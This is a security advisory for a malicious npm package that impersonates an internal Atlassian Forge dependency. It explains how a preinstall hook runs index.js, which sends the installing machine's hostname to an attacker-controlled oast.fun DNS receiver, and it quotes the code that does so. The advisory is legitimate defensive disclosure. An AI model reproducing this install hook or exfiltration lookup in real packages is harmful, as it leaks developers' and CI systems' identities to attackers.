atlassian-forge-skills @29.1.0
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 4:30 AM UTC
OSV ID
MAL-2026-5891
Ecosystem
npm
Summary
Package impersonates an internal Atlassian Forge dependency (unscoped name atlassian-forge-skills , description 'Internal package', generic author 'Team'). package.json declares "preinstall": "node index.js" , which fires automatically on npm install . index.js lines 6-8 read os.hostname() and embed it as a subdomain of a hardcoded interactsh OAST receiver: const targetDomain = ${hostname}.zcagyqqmvnmgsklstrrr6xo2715tov7wz.oast.fun ; dns.lookup(targetDomain, () => {}); . The DNS lookup is sufficient to leak the installer's hostname to the attacker-controlled oast.fun DNS server — the canonical dependency-confusion payload, where any developer or CI pipeline that mistakenly resolves an internal Atlassian package name to this public registry entry exposes host identity for follow-on targeting.
Source: amazon-inspector (0ca0f4b99cda621977551550ed678ad77ee82827714acb9d08534f53b0642e3c)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.